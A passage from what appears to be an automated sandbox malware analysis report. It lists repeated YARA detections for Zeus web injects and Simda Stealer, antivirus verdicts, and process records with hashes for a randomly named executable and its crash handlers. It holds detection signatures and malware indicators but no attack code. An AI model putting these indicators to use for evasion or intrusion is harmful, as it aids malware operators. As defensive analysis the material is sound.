                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2122713392.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2148028123.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2113736321.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2145570394.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2148606748.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2145310985.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2149174831.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2138544966.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2144590215.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2060969300.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1321020929.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2064310969.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2144407040.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2139736993.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2106030537.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2145118910.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2148806310.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2148998484.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2092705470.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2144869622.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2103159586.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2148222481.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2145950439.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2143582018.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2130882099.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2145767072.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1318727770.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1318727770.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2110805717.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:12:25:40
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                            Start time:12:25:40
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:12:25:40
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:12:25:41
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744
                                                                                                                                                                                                            Imagebase:0xb30000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:12:25:41
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 732
                                                                                                                                                                                                            Imagebase:0xb30000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:12:25:41
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:12:25:41
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 740
                                                                                                                                                                                                            Imagebase:0xb30000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:12:25:43
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                            Start time:12:25:43
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 740
                                                                                                                                                                                                            Imagebase:0xb30000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                            Start time:12:25:43
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                            Start time:12:25:44
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:12:25:45
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:12:25:45
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:12:25:46
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:12:25:46
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:12:25:46
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:12:25:47
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

